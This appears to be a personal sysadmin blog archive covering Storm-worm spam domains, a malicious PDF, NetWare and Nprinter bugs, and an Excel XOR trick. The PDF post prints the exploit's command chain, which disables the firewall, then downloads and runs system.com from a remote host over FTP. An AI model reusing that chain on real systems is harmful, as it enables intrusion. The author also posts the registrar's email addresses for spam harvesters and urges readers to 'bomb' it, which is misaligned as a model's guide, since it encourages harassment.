Archive for the ‘English’ Category

Az első matchbox élmények…

Sunday, January 13th, 2008

Melyik legyen a következő versenyző a törésteszten?
/Who’s gonna be the next contestant in the crash-test?/

 

Ah, meg is van…
/Ah, we have it…/

 

“About an hour and a half ago – we’ve had no explanation – police estimate some three to four hundred people – they just, they just got out and walked. God! We’ve gotten confirmation we cannot find anyone…
I’ve never seen anything like this…”
[REM – Everybody Hurts – Lyrics]

(dedicated to Sam.Joe)

Merry Christmas – Not…

Wednesday, December 26th, 2007

Guess what’s happening on Christmas?

E-mails starts to flow wishing merry christmas with links to uhavepostcard (dot com) and merrychristmasdude (dot com). One gets suspicious. And it turns out, one is right – again. Do not visit the above links unless you keen on getting some new trojans…

After adjusting our server’s spam filter, I do some more research. Some antivirus products recognise the downloadable, some not.

Domains were registered on 23rd of December, the registration data are obviusly fake (ZIP 12345, yahoo and hotmail e-mail accounts, etc.).
The problem is with this domain based spamvertizing, that – unlike the IP based ones – the domain can exist and can be maintained for longer period of time, it’s nameserver records can be changed, which by the way currently consist of 2*13 entries from different countries and different ISP-s.
Serving of the “webservers” IP address are done by these “bot-NS” servers, from a pool of thousands of other bot’s, so it is easily understandable that stopping these is impossible.

So, then one writes to the domain registrator company – responsible for registering the domains in question – to null out the nameservers and put the domain on hold (render the domain useless and not to let the domain to be registered elsewhere). The registrator happens to be Russian (RU-CENTER), which doesn’t look good at first sight.

However, some answer comes back, with the essence of that I should report to ICANN/Internic, if the domain have invalid registration data. Then after ICANN notifies them, they try to contact the owner, and if no answer comes back in 2 weeks(!), then they switch off the domain.

Those who understand even a tiny bit what this is about, now say “ridiculous”. After two weeks from now, whent the trojan was downloaded million times, noone will care whether the above domains exist or not.

I’ve tried once more explaining that if we can’t kill it at the domainregistration level, there is no chance doing anything else, like digging up thousands of bot’s IP’s and reporting them one-by-one (meanwhile newer ones join).
The last reply I got is currently this:

“We have initiated the check of the Whois information according to advised ICANN procedure. If it is really fail we will remove domain names.”

I’m really curious when will anything happen to these damned domains.

Update:
Dec 26, 18:04 [UTC +01:00] – New spamvertized malware hosting domain: HAPPYCARDS2008[.COM] – similar fake details, new registration, etc. Another urging message to the Russians. A slogan popped up into my mind, from an early MTV environmental advertisement. “If you’re not part of the solution, you’re part of the problem…”

Dec 26, 20:33 [UTC +01:00] – I didn’t get any answer from RU-CENTER nor I see the domains disappearing. So I encourage anyone who cares a little bit to contact (“bomb”) RU-CENTER at the “tld-ncc [@] nic.ru” address regarding to this matter. Other forms of contact can be seen here: http://www.nic.ru/about/en/contact_ncc.html
I’m amazed how many people wrote blog entries on this issue, yet none seemed to contact the only place which can do anything, the “tree root”. Come on people, you can do better. Or do I have to save the world (again) single handedly? :-]

Dec 27, 10:15 [UTC +01:00]
1st newyearcards2008[.com] spams – RU-Center urged to act again. Seems like if you want to spam, you should choose them to register your domain…

Dec 28, 16:51 [UTC +01:00]
new domain: newyearwithlove.com – reported at ICANN/Internic

Jan 05, 15:39 [UTC +01:00]
As you might have guessed, I got tired of reporting to an unresponsive registrator, internic and sirt.
There is not much I can do, and many others started to complain and comment on this issue.
Such as – but not limited to:
http://www.castlecops.com/p1038986-storm_worm_spam.html#1038986
Where – among others – you can see my “open letter to RU-CENTER”.
That was addressed on the 28th of December to ru-ncc@nic.rutld-ncc@nic.ru, tld-adm@nic.ru, tld-tech@nic.ru and info@cert.ru
Since they didn’t bother to do anything or at least answer, the most I can do is to list their addresses here and hope that email address harverster bots will “get the message” and eventually make them feel the same way like many of us.

Spamhaus complaint listed at: http://www.spamhaus.org/news.lasso?article=624

List of all domains registered relating to this fast-flux storm-bot Christmas/New Year “event”:
http://www.spamtrackers.eu/wiki/index.php?title=Storm#December_29

Jan 09, 15:53 [UTC +01:00]
Just received a mail from RU-CENTER:

Dear Sirs,
 
The domains:
 
HAPPYCARDS2008.COM
NEWYEARWITHLOVE.COM
UHAVEPOSTCARD.COM
MERRYCHRISTMASDUDE.COM
 
are put on hold,
 
— 
Best Regards,
 
Julia A. Lotkova
Regional Network Information Center (RU-CENTER)
Phone:  +7 495 737-0601
fax:    +7 495 737-0602
http://www.nic.ru”  

I checked all known domains, they show “NOT-DELEGATED” and seems like they dont’t work anymore.
And it only took like 16 days!!!
Let’s be happy folks – and prepare for the new domains which will be registered soon…

Jan 10, 11:51 [UTC +01:00]
From: “RU-CENTER NCC”
Sent: Thursday, January 10, 2008 11:51 AM
Subject: [ru-center #1781157] Re: open letter to RU-CENTER 

Dear Sirs, 
 
The domains are put on hold, thank you for your report. 
New alike registrations are monitored. 
 
— 
Best Regards, 
 
Julia A. Lotkova 
Regional Network Information Center (RU-CENTER) 
Phone: +7 495 737-0601 
fax: +7 495 737-0602 
http://www.nic.ru

so let’s hope that at least new domains won’t be registered here.

Az előző PDF exploit magyarázata – details on PDF containing exploit

Tuesday, October 30th, 2007

Így néz ki a tegnap kapott biztonsági hibát tartalmazó PDF fájl:
(This is how the recently received PDF document’s exploit looks like:)

../../../windows/system32/cmd”.exe”” /c ” cmd
/c = kódvégrehajtás “parancs1 & parancs2 & … & parancsN” formában, idézőjelek között, “&” jellekkel elválasztva.
/c = execution of commands, between quotes, separated by “&”s, eg.: “command1 & command2 & … & commandN”

set
cls

netsh firewall set opmode mode=disable
kikapcsoljuk a tűzfalat (disable the firewall)

echo o 81.95.146.181 >i
echo binary >>i
echo get /system.com >>i
echo quit >>i
“i” nevű ftp scriptet kreálása, mely megnyitja a 81.95.146.181-es hostot, bináris módba kapcsol, letölti a system.com-ot majd kilép.
(Creation of FTP script “i”, which will open 81.95.146.181, switches to binary, downloads system.com then exits)

ftp -s:i -v -A >nul
Az FTP script végrehajtása (-v=távoli kiszolgáló válaszainak letiltása, -A=Anonim bejelentkezés)
(Execution of the FTP script. -v=don’t display remote replies, -A=use anonymous account)

del /q i
Script törlése (Delete script)

start system.com
Letöltött “system.com” indítása
(Execution of downloaded “system.com”)

Mellesleg én nem tudtam letölteni de még kapcsolódni sem a fenti IP-hez, valószínűleg túl lett terhelve vagy lekapcsolták…
(BTW, I wasn’t able to download or even connect to the above IP. Might be overloaded or kicked off.”)

Food for tought…

Wednesday, October 24th, 2007

Zöldségkosár – Greenpieces

Tojásék – Hello from the Ham and Eggs family

 

Ubi forti – cucumbersome

Excel reloaded

Sunday, October 14th, 2007

És akkor álljon itt az Excel-es (Openoffice-os) XOR implementáció. Mivel az interneten nem találtam hasonló leírást, angolul (is) részletezem, hogy örüljenek más kontinenseken is…

Once upon a time, I wanted to do some basic XOR-ing in excel. Then I realized that there are no such thing a XOR. So I “developed” one and even though this is pretty simple to do, Google doesn’t seem to get such a solution, so I publish it here and now.

Since XOR is basically similar to add, eg.: (binary) adding or XOR-ing 0 vs. 1, 1 vs. 0 and 0 vs. 0 result the same, we only have to “do something” when there are two “1”-s to be dealt, as 1+1=2 but 1 xor 1=0.
Unfortunately to convert to binary, we need to enable Analysis Toolpak in Tools/Add-ins (in hungarian: Eszközök/Bővítménykezelő) to allow to use DEC2BIN (and HEX2BIN, whichever you want) then it is easy pie.

Let’s see 15 XOR 6
15 (decimal) will become 1111 “bin” after a DEC2BIN(15) and 6 will become 110. Adding the converted numbers as decimal will result in 1221. Then a SUBSTITUTE of “2”-s to “0”-s will be 1001, so after a BIN2DEC, you will get the result: 9.
(Doing “OR” instead of “XOR” would need a replacement of “2”-s to “1”-s)

xxx2yyy conversion fuctions have a limit of 0-511, so if your number is above, deal with it first.

So, if A1 and B1 contains the two (decimal) numbers to be xored, then C1 would be:
=SUBSTITUTE(DEC2BIN(A1)+DEC2BIN(B1),2,0)

Magyarul: Ha A1 és B1 tartalmazza a két összexorolandó (decimális) számot, akkor C1:
=HELYETTE(DEC2BIN(A1)+DEC2BIN(B1);2;0)
(angol excel vagy openoffice esetén az angolnál leírt képlet)
Az xxx2xxx függvények használatához engedélyeznünk kell az Eszközök/Bővítménykezelő-ben az Analysis Toolpak bővítményt melyek 0-tól 511-ig terjedő tartományban bírnak (csak) működni.

We get the result in binary, which we can convert with BIN2DEC or BIN2HEX (can also use HEX2BIN instead of DEC2BIN if we want to xor hex numbers right away)

Other ideas welcome / Egyéb ötletek jöhetnek

mystery solved: NetWare 3.x/4.x remirror starting at 88%

Tuesday, July 17th, 2007

Finally I took some minutes and checked that cosmetic issue, which symptoms in showing 88% percent remirror status right after the start of a remirroring (where it should be 0%) on earlier NetWares.

If install.nlm shows 42.949.680 or more data blocks (that is 171.798.720 sectors, approximately 163,84 GB) for a partition, then mirror algorithm will fail to correctly calculate the percentage.

Let’s say, we have 48.832.973 (0x2E921CD) data blocks, with 6627 (0x19E3) redirection blocks.
Then according to server.exe’s calculation, ~48.408.845 (~0x2E2A90D) “mirror blocks” should be mirrored.
There is an instruction “IMUL EBX*64h” which multiplies this value by 100 (0x64), but then the value will overflow the poor 32bit register, resulting in 0x1208A0914.
Then dividing the remaining 32bit part only (0x208A0914) by the number of data blocks (0x2E921CD) would result in 11 (0xB) which would be 99-11=88% complete.
So from then on, it will reach 99% by about mirrorring the 0xA699D-th block, then at next block it would “jump to” 12% (0xffffe10/0x2E921CD=0x57=87 -> 99-87=12%)
Then it would go to 99% “normally”

This only affects the calculation and display of the status percentage, not the mirroring procedure itself.
So even 3.x/4.x NetWares – more precisely the NetWare traditional file system – can handle large harddisk/block size, but seems like who wrote the “display percentage calculation” part wasn’t prepared enough…

Traditional file system’s “most important” size related limitations:
Maximum device size recognized (physical or logical): 2 TB
Maximum partition size: 1 TB
Maximum volume size: 1 TB
Maximum file size: 4 GB

Here is a more detailed comparsion on traditional FS versus NSS.

Fault tolerance – reloaded

Friday, July 13th, 2007

Minimum requirements for RAID-5 – or RAID-1 with hot spare.

Uptime: 610 days…

Fault tolerance

Saturday, June 23rd, 2007

It is never too early to be fault tolerant!

Pacifier (North American English), dummy (British, New Zealand, and Australian English) or soother (Canadian and Irish English), is a rubber, plastic or silicone nipple given to an infant or other young child to suck upon” – furthermore referred as “object”.

As we can see, my son is fault tolerant, it has a “hot spare” object in his hand, in case any fault of the object currently in use.

By exchanging the objects time to time (striping), load balancing can be achieved, thus object’s lifetime will be doubled (MTTF/MTBF).

Mirrored objects are all synchronized.

——————————————————————-

 

Sosincs elég korán hibatűrő rendszert használni. 

A fiam hibatűrő cumi rendszerrel van felszerelve, a “rendelkezésre álló egység” bármikor kiválthatja az esetlegesen elromló aktuálisan használt egységet. Az egységek időnkénti cserélgetésével elérhető a terhelésmegosztás és ebből eredően az egységek hosszabb élettartama.

VBS – VS_FIXEDFILEINFO

Tuesday, May 29th, 2007

 

To make it short, I was writing a part of a login script in vbs which collects some version information on some “critical” software, and I was a bit suprised when I saw, that “getfileversion” returns 0.0.0.0 for Cisco Systems VPN Client files (such as ipsecdialer.exe). In this case, this happens, because the data part of it’s VS_FIXEDFILEINFO is not filled out properly (at all), …

… thus you can only rely on the “text based” stringfileinfo’s productfile information.

I was looking for several hours to find a method to obtain those parts with some simple commands or script, but all I could find referred to Visual Basic (not VB Script) or C.
“When I was young”, I wrote an assembly program (version.com on this page) to read data from VS_FIXEDFILEINFO, so I knew that implement it from the scratch would take some time, so I searched along…

Then I found an excellent site with excellent scripts, such what I needed: http://www.jsware.net/jsware/scripts.php3#fvinfo

Even more, I found some “comments” which I couldn’t even find it on Microsoft’s site:
Normally there is no VBScript method to return the information that shows when a file is right-clicked, then “Properties” is clicked, and the “Version” tab is selected.
I mean: Come on, Microsoft!?! Sometimes documenting that something cannot be done is better than nothing, at least I wouldn’t try to look for an “all-in-one” vbs command for it.

The script is neatly written and does the job. However, after some consideration, I decided not to put another 16K into the login script (tripling its size) just for read one screwed up application’s version number, I will just rely on the DisplayName value of the registry’s relevant uninstall key’s “DisplayName”, it is currently “Cisco Systems VPN Client 4.8.00.0440” on my system, so extracting the version number out of it would do the job.

Anyway, hats off to JSWare for creating and publishing such a brilliant code sample for obtaining version info from the VS_FIXEDFILEINFO resource.

Nprinter history and comment page

Friday, May 11th, 2007

This page is to let people know what happened (and what not) in connection with the problem that exhibits when using Nprinter (for NT) on an XP with Novell Client 32. (Eg.: blue screen – DRIVER_IRQL_NOT_LESS_OR_EQUAL)
Here you can also express your comments regarding to this issue.
Since the current status of this issue at Novell is “Closed” (unresolved), please do leave your comment here, to raise the chance of this issue to be fixed.

In “short” (but really…):

  • I created “my” webpage on Nprinter on 2004.JUN.07. This is approximately more than a year after I needed to have nprinter on Windows 2000 and XP. Later on I started experiencing this issue on XP machines…
  • Time passed, I got mails and I also experienced the problem at other customers too.
  • I experienced a problem at a customer, where finally we had to buy some print servers to solve the problem, so I got “pissed off”, then I reported “NWClient 491SP2+PKA – nwsipx32.sys – DRIVER_IRQL_NOT_LESS_OR_EQUAL” to: Novell’s patchfeedback address on: Wednesday, May 24, 2006 11:44 AM (with screenshots and other details)
  • Same day I got answer from Earle Wells congratulating on how I detailed the problem and that I should use NDPS.
  • After several more letters on the same day, I “achieved” that we’ve reached to: “Good news! Engineering is willing to take a look at a kernel memory dump”
  • I sent dump, next day he informed me that they found the bug, but it would be too problematic to fix it and probably would never be fixed. An internal TID was also created, and service request ticket was closed.
  • I got several more letters from other “nprinter fan-s” and on 2006 August 17, I contacted my Novell “internal” / “problem-solver” friend to check if there is anything more we could do. Next day he wrote me back, that it is in the “wontfix” category, and he could talk about it in more detail for hours…
  • So I called him. As far as I remember, he explained that it is not even clear that this is a nwsipx32 bug (as sometimes it happens in tdi.sys which is XP’s part), and it is low priority and obsolete and so on (which I’ve already known/suspected).
    I also tried to ask what would be the cost of fixing this, but it is not the matter of money. I also got the internal mailing on this, saying:
       > The particular point at which the NULL pointer is being
       > dereferenced is within a Microsoft-supplied TDI compile-
       > time macro, and between the complexity of it & the fact that
       > this is release code with full optimization, its going to take a
       > couple hours of de-compiling the previous instructions to
       > root out what exactly was being referenced that was NULL.
       > After that of course comes “why”.
       > So it’s not something that is a slam-dunk or quickly
       > actionable, which doesn’t bode well for an NWSIPX32
       > issue being observed primarily
  • So the same day (2006.AUG.18) I contacted another friend of mine – who is my partner’s brother and working for Microsoft at Seattle -, asking whether there is any bugreport on TDI.SYS [based on: http://support.microsoft.com/kb/829120/en-us] or a patch/beta release of the file.
  • Next day I got a negative answer and also a suggestion that I should contact MS support starting from “support.microsoft.com“.
  • I answered that I don’t “believe” in having any result of a noname guy opening incident via web support, and even if I would, where to start at all…
  • Two days later (AUG.21) he mailed that he don’t really know where to start (and via OEM, VAP, Technet or what other channel) and he will ask around.
  • On 22nd, another friend of mine called me. I didn’t have any news on what he is doing lately, but it turned out that he is the Director of Support at Microsoft Hungary
  • He guided me what link should I use to let them have green light on this problem and he called me after he “saw” the incident getting started in their system. Then a hour later a support guy called me, I said I didn’t have much more information, but I made dumps available for them to download.
  • We agreed that they should look into dumps only where the BSOD happens in TDI.SYS (and not in NWSIPX32.SYS) as the issue exhibits itself sometimes in TDI.SYS, sometimes in NWSIPX32.SYS
  • On 23rd I got called from MS Hun. tech support that they need to escalate the problem to higher level, to debug the dump more thoroughly, and also because this really seems to be a “bug”, not a “support incident”. [id: SRQ060822600811]
  • On 24th, I got called saying the dump has been done, and the BSOD is Novell’s fault. I asked more (written) technical data, then later I got a a forwarded mail with also not to much technical information, mainly saying: “… basically the problem is caused by a novell driver that is not compatible to windows xp.”
  • Then I replied that I would really need more technical info to be able to “bounce back” the problem to Novell.
  • Finally I got a Windebug analysis with some comments.
    The most important was:
    “f88a9dac 805ce794 f8b79298 00000000 00000000 nwsipx32+0x4d3a < ---   Here we see the 3rd party driver loaded - but as we do not have the source code / symbols we cannot see the arguments passing up"
  • Then I realized I can also do a windebug analyze, so I downloaded and installed Windebug and some other required tools. I “analyzed” the rest of my dumps and created a very detailed analysis and comparsion on the different dumps.
  • On 28th, I forwarded my results to my friend at Novell Hungary.
  • On Sep. 1 MS contacted me to ask if they can close the incident.
  • I asked my friend at Novell on where are we. He said, his guy is on vacation, so I should hold on.
  • Time passed, then on Oct 11, I got an information from Novell that they assigned a priority to the bug. Even very low, but anyting can be higher than “wontfix”…
  • On FEB 23, 2007, I got a mail that says the bug is planned to be fixed in 4.91SP5.
    Though I don’t have permission to bugzilla, the link is here, and it’s main content is:
       What                 |Removed         |Added
    ———————————————————————
    Fixed in Milestone|—                     |4.91 SP5
  • Beginning of May I was informed that the status of this “issue” is “closed”. Not a “wontfix”, but basically closed without a solution.
  • I was also suggested that everyone having this problem should contact Novell and open an incident…

Since I believe it would be harder to convince people to do so I tried to support my already opened incident with the dozens of mails I received relating to this issue and I still would like your comment and some data (number of computers affected, maybe company name). The email field at the comment will not be published, so feel free to use your valid address if you would like to be notified upon any advancement.